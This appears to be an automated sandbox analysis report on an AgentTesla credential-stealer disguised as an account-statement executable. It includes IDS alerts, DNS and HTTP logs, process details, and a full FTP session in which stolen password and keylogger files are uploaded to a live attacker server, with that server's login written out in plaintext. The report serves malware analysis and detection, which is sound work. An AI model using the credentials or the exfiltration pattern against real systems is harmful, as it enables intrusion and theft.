                                                SHA256:1b9d152c5cd6e2904ada0ca707dbd2bb089ac59f8b07723490552a000848cc54
                                                SHA512:31a7210e2ef813763225c39f5c42f00cd7899539755fd090e256ab17a16c88238e9a659bed9cf4bfd9f5bcb310fb850a6e2e04c41aaf1f2f8fd98db99fa8addc
                                                SSDEEP:6144:Y9yYMqdl+a/ZNntauGBOaYcR/uVc3fTlAoOjlrrhTFInd6Xcfg9UJU8:2dMqdl+YZNorUVcvWoOJFTWndm+
                                                TLSH:D6A4AE583BA008B5D53A89F5F8F5803D7A3079A225E2C82525CF1FDC7DCAB50899726F
                                                Icon Hash:00928e8e8686b000
                                                Entrypoint:0x47832e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x9FFD5834 [Thu Jan 21 21:42:12 2055 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x782d4 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7a000 | 0x586 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x76334 | 0x76400 | 9cbabd01a398367b1340d08042982fd0 | False | 0.6754694932610994 | data | 7.494181501767098 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x7a000 | 0x586 | 0x600 | 0e874ca99d069383826abad4e45e4f71 | False | 0.4127604166666667 | data | 4.0143412955081095 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7c000 | 0xc | 0x200 | 53e20c5b5bbaeab7ffd53901fdb8269b | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x7a0a0 | 0x2fc | data | | | 0.43455497382198954
RT_MANIFEST | 0x7a39c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-31T14:01:58.492073+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.5 | 49707 | 213.189.52.181 | 21 | TCP
2024-12-31T14:01:59.039543+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49709 | 213.189.52.181 | 63775 | TCP
2024-12-31T14:01:59.044751+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49709 | 213.189.52.181 | 63775 | TCP
2024-12-31T14:02:12.444136+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.5 | 49713 | 213.189.52.181 | 21 | TCP
2024-12-31T14:02:13.007555+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49718 | 213.189.52.181 | 63475 | TCP
2024-12-31T14:02:13.012652+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49718 | 213.189.52.181 | 63475 | TCP
2024-12-31T14:02:20.618400+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.5 | 49745 | 213.189.52.181 | 21 | TCP
2024-12-31T14:02:21.179731+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49756 | 213.189.52.181 | 63292 | TCP
2024-12-31T14:02:21.188362+0100 | 1800009 | Joe Security MALWARE AgentTesla - FTP Exfil Passwords | 1 | 192.168.2.5 | 49756 | 213.189.52.181 | 63292 | TCP
2024-12-31T14:02:21.188362+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49756 | 213.189.52.181 | 63292 | TCP
2024-12-31T14:03:30.360786+0100 | 1800007 | Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs | 1 | 192.168.2.5 | 49990 | 213.189.52.181 | 64485 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 14:01:54.737750053 CET | 52186 | 53 | 192.168.2.5 | 1.1.1.1
Dec 31, 2024 14:01:54.744622946 CET | 53 | 52186 | 1.1.1.1 | 192.168.2.5
Dec 31, 2024 14:01:56.672291994 CET | 53402 | 53 | 192.168.2.5 | 1.1.1.1
Dec 31, 2024 14:01:56.682233095 CET | 53 | 53402 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 31, 2024 14:01:54.737750053 CET | 192.168.2.5 | 1.1.1.1 | 0x263f | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Dec 31, 2024 14:01:56.672291994 CET | 192.168.2.5 | 1.1.1.1 | 0x23c4 | Standard query (0) | s4.serv00.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 31, 2024 14:01:54.744622946 CET | 1.1.1.1 | 192.168.2.5 | 0x263f | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 14:01:54.744622946 CET | 1.1.1.1 | 192.168.2.5 | 0x263f | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 14:01:54.744622946 CET | 1.1.1.1 | 192.168.2.5 | 0x263f | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 14:01:56.682233095 CET | 1.1.1.1 | 192.168.2.5 | 0x23c4 | No error (0) | s4.serv00.com | | 213.189.52.181 | A (IP address) | IN (0x0001) | false
                                                • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 104.26.12.205 | 443 | 1288 | C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 13:01:55 UTC | 155 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
2024-12-31 13:01:55 UTC | 424 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 31 Dec 2024 13:01:55 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: close
                                                Vary: Origin
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 8faa7604ef1042fd-EWR
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1561&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1749550&cwnd=248&unsent_bytes=0&cid=58348ebbd0706511&ts=159&x=0"
2024-12-31 13:01:55 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                Data Ascii: 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49712 | 104.26.12.205 | 443 | 7116 | C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 13:02:09 UTC | 155 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
2024-12-31 13:02:09 UTC | 424 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 31 Dec 2024 13:02:09 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: close
                                                Vary: Origin
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 8faa765d69db176c-EWR
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1486&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1916010&cwnd=252&unsent_bytes=0&cid=cd596e23147c0a8d&ts=158&x=0"
2024-12-31 13:02:09 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                Data Ascii: 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49732 | 104.26.12.205 | 443 | 6292 | C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 13:02:17 UTC | 155 | OUT | GET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
2024-12-31 13:02:17 UTC | 424 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 31 Dec 2024 13:02:17 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: close
                                                Vary: Origin
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 8faa768ffac242e3-EWR
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1566&rtt_var=593&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1837633&cwnd=204&unsent_bytes=0&cid=683729b5134b66a9&ts=177&x=0"
2024-12-31 13:02:17 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                Data Ascii: 8.46.123.189


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Dec 31, 2024 14:01:57.269740105 CET | 21 | 49707 | 213.189.52.181 | 192.168.2.5 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 4 of 150 allowed.
220-Local time is now 14:01. Server port: 21.
220-This is a private system - No anonymous login
220 You will be disconnected after 15 minutes of inactivity.
Dec 31, 2024 14:01:57.270003080 CET | 49707 | 21 | 192.168.2.5 | 213.189.52.181 | USER f2241_evico
Dec 31, 2024 14:01:57.459942102 CET | 21 | 49707 | 213.189.52.181 | 192.168.2.5 | 331 User f2241_evico OK. Password required
Dec 31, 2024 14:01:57.460134983 CET | 49707 | 21 | 192.168.2.5 | 213.189.52.181 | PASS Doll650#@
Dec 31, 2024 14:01:57.718554020 CET | 21 | 49707 | 213.189.52.181 | 192.168.2.5 | 230 OK. Current restricted directory is /
Dec 31, 2024 14:01:57.908855915 CET | 21 | 49707 | 213.189.52.181 | 192.168.2.5 | 504 Unknown command
Dec 31, 2024 14:01:57.915699959 CET | 49707 | 21 | 192.168.2.5 | 213.189.52.181 | PWD
Dec 31, 2024 14:01:58.105416059 CET | 21 | 49707 | 213.189.52.181 | 192.168.2.5 | 257 "/" is your current location
Dec 31, 2024 14:01:58.105654001 CET | 49707 | 21 | 192.168.2.5 | 213.189.52.181 | TYPE I
Dec 31, 2024 14:01:58.295603037 CET | 21 | 49707 | 213.189.52.181 | 192.168.2.5 | 200 TYPE is now 8-bit binary
Dec 31, 2024 14:01:58.295809031 CET | 49707 | 21 | 192.168.2.5 | 213.189.52.181 | PASV
Dec 31, 2024 14:01:58.486294985 CET | 21 | 49707 | 213.189.52.181 | 192.168.2.5 | 227 Entering Passive Mode (213,189,52,181,249,31)
Dec 31, 2024 14:01:58.492073059 CET | 49707 | 21 | 192.168.2.5 | 213.189.52.181 | STOR PW_user-724536_2024_12_31_08_01_55.html
Dec 31, 2024 14:01:59.039180994 CET | 21 | 49707 | 213.189.52.181 | 192.168.2.5 | 150 Accepted data connection
Dec 31, 2024 14:01:59.230031013 CET | 21 | 49707 | 213.189.52.181 | 192.168.2.5 | 226-File successfully transferred
226 0.191 seconds (measured here), 1.78 Kbytes per second
Dec 31, 2024 14:02:11.168958902 CET | 21 | 49713 | 213.189.52.181 | 192.168.2.5 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 4 of 150 allowed.
220-Local time is now 14:02. Server port: 21.
220-This is a private system - No anonymous login
220 You will be disconnected after 15 minutes of inactivity.
Dec 31, 2024 14:02:11.169184923 CET | 49713 | 21 | 192.168.2.5 | 213.189.52.181 | USER f2241_evico
Dec 31, 2024 14:02:11.359651089 CET | 21 | 49713 | 213.189.52.181 | 192.168.2.5 | 331 User f2241_evico OK. Password required
Dec 31, 2024 14:02:11.360601902 CET | 49713 | 21 | 192.168.2.5 | 213.189.52.181 | PASS Doll650#@
Dec 31, 2024 14:02:11.664518118 CET | 21 | 49713 | 213.189.52.181 | 192.168.2.5 | 230 OK. Current restricted directory is /
Dec 31, 2024 14:02:11.858036041 CET | 21 | 49713 | 213.189.52.181 | 192.168.2.5 | 504 Unknown command
Dec 31, 2024 14:02:11.865643024 CET | 49713 | 21 | 192.168.2.5 | 213.189.52.181 | PWD
Dec 31, 2024 14:02:12.058001995 CET | 21 | 49713 | 213.189.52.181 | 192.168.2.5 | 257 "/" is your current location
Dec 31, 2024 14:02:12.058142900 CET | 49713 | 21 | 192.168.2.5 | 213.189.52.181 | TYPE I
Dec 31, 2024 14:02:12.248311996 CET | 21 | 49713 | 213.189.52.181 | 192.168.2.5 | 200 TYPE is now 8-bit binary
Dec 31, 2024 14:02:12.248429060 CET | 49713 | 21 | 192.168.2.5 | 213.189.52.181 | PASV
Dec 31, 2024 14:02:12.438653946 CET | 21 | 49713 | 213.189.52.181 | 192.168.2.5 | 227 Entering Passive Mode (213,189,52,181,247,243)
Dec 31, 2024 14:02:12.444135904 CET | 49713 | 21 | 192.168.2.5 | 213.189.52.181 | STOR PW_user-724536_2024_12_31_08_02_09.html
Dec 31, 2024 14:02:13.007286072 CET | 21 | 49713 | 213.189.52.181 | 192.168.2.5 | 150 Accepted data connection
Dec 31, 2024 14:02:13.198127031 CET | 21 | 49713 | 213.189.52.181 | 192.168.2.5 | 226-File successfully transferred
226 0.191 seconds (measured here), 1.78 Kbytes per second
                                                Dec 31, 2024 14:02:19.372648001 CET  21  49745  213.189.52.181  192.168.2.5  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                220-You are user number 4 of 150 allowed.
                                                220-Local time is now 14:02. Server port: 21.
                                                220-This is a private system - No anonymous login
                                                220 You will be disconnected after 15 minutes of inactivity.
                                                Dec 31, 2024 14:02:19.372910976 CET  49745  21  192.168.2.5  213.189.52.181  USER f2241_evico
                                                Dec 31, 2024 14:02:19.567356110 CET  21  49745  213.189.52.181  192.168.2.5  331 User f2241_evico OK. Password required
                                                Dec 31, 2024 14:02:19.567485094 CET  49745  21  192.168.2.5  213.189.52.181  PASS Doll650#@
                                                Dec 31, 2024 14:02:19.831259966 CET  21  49745  213.189.52.181  192.168.2.5  230 OK. Current restricted directory is /
                                                Dec 31, 2024 14:02:20.025906086 CET  21  49745  213.189.52.181  192.168.2.5  504 Unknown command
                                                Dec 31, 2024 14:02:20.026046038 CET  49745  21  192.168.2.5  213.189.52.181  PWD
                                                Dec 31, 2024 14:02:20.220060110 CET  21  49745  213.189.52.181  192.168.2.5  257 "/" is your current location
                                                Dec 31, 2024 14:02:20.220176935 CET  49745  21  192.168.2.5  213.189.52.181  TYPE I
                                                Dec 31, 2024 14:02:20.413980007 CET  21  49745  213.189.52.181  192.168.2.5  200 TYPE is now 8-bit binary
                                                Dec 31, 2024 14:02:20.417009115 CET  49745  21  192.168.2.5  213.189.52.181  PASV
                                                Dec 31, 2024 14:02:20.610661983 CET  21  49745  213.189.52.181  192.168.2.5  227 Entering Passive Mode (213,189,52,181,247,60)
                                                Dec 31, 2024 14:02:20.618400097 CET  49745  21  192.168.2.5  213.189.52.181  STOR PW_user-724536_2024_12_31_08_02_17.html
                                                Dec 31, 2024 14:02:21.171152115 CET  21  49745  213.189.52.181  192.168.2.5  150 Accepted data connection
                                                Dec 31, 2024 14:02:21.377569914 CET  21  49745  213.189.52.181  192.168.2.5  226-File successfully transferred
                                                226 0.206 seconds (measured here), 1.65 Kbytes per second
                                                Dec 31, 2024 14:03:29.601514101 CET  49707  21  192.168.2.5  213.189.52.181  PASV
                                                Dec 31, 2024 14:03:29.791431904 CET  21  49707  213.189.52.181  192.168.2.5  227 Entering Passive Mode (213,189,52,181,251,229)
                                                Dec 31, 2024 14:03:29.800921917 CET  49707  21  192.168.2.5  213.189.52.181  STOR KL_user-724536_2025_01_15_08_20_38.html
                                                Dec 31, 2024 14:03:30.355446100 CET  21  49707  213.189.52.181  192.168.2.5  150 Accepted data connection
                                                Dec 31, 2024 14:03:30.547830105 CET  21  49707  213.189.52.181  192.168.2.5  226-File successfully transferred
                                                226 0.192 seconds (measured here), 1.47 Kbytes per second

                                                Target ID:0
                                                Start time:08:01:53
                                                Start date:31/12/2024
                                                Path:C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe"
                                                Imagebase:0xf70000
                                                File size:486'912 bytes
                                                MD5 hash:CF173CA1DB13DFC7237FD33630926B65
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2018623080.0000000004329000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:1
                                                Start time:08:01:53
                                                Start date:31/12/2024
                                                Path:C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe"
                                                Imagebase:0x750000
                                                File size:486'912 bytes
                                                MD5 hash:CF173CA1DB13DFC7237FD33630926B65
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4486848273.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4486848273.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4486848273.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Target ID:4
                                                Start time:08:02:07
                                                Start date:31/12/2024
                                                Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                Imagebase:0x570000
                                                File size:486'912 bytes
                                                MD5 hash:CF173CA1DB13DFC7237FD33630926B65
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 50%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                Target ID:5
                                                Start time:08:02:07
                                                Start date:31/12/2024
                                                Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                Imagebase:0x340000
                                                File size:486'912 bytes
                                                MD5 hash:CF173CA1DB13DFC7237FD33630926B65
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:6
                                                Start time:08:02:07
                                                Start date:31/12/2024
                                                Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                Imagebase:0x9d0000
                                                File size:486'912 bytes
                                                MD5 hash:CF173CA1DB13DFC7237FD33630926B65
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2241640405.0000000002CCC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2237605469.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2241640405.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2241640405.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:8
                                                Start time:08:02:15
                                                Start date:31/12/2024
                                                Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                Imagebase:0x590000
                                                File size:486'912 bytes
                                                MD5 hash:CF173CA1DB13DFC7237FD33630926B65
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:9
                                                Start time:08:02:15
                                                Start date:31/12/2024
                                                Path:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                                                Imagebase:0x5b0000
                                                File size:486'912 bytes
                                                MD5 hash:CF173CA1DB13DFC7237FD33630926B65
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4487080897.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.4487080897.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.4487080897.000000000290C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                  Execution Graph

                                                  Execution Coverage:7.6%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:33
                                                  Total number of Limit Nodes:5

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0163D296
                                                  • GetCurrentThread.KERNEL32 ref: 0163D2D3
                                                  • GetCurrentProcess.KERNEL32 ref: 0163D310
                                                  • GetCurrentThreadId.KERNEL32 ref: 0163D369
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0163D296
                                                  • GetCurrentThread.KERNEL32 ref: 0163D2D3
                                                  • GetCurrentProcess.KERNEL32 ref: 0163D310
                                                  • GetCurrentThreadId.KERNEL32 ref: 0163D369
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0

                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0163B0B6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0

                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 016359C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0

                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 016359C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0

                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0163D4E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0

                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0163D4E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 464 163b050-163b090 465 163b092-163b095 464->465 466 163b098-163b0c3 GetModuleHandleW 464->466 465->466 467 163b0c5-163b0cb 466->467 468 163b0cc-163b0e0 466->468 467->468
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0163B0B6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  Memory Dump Source
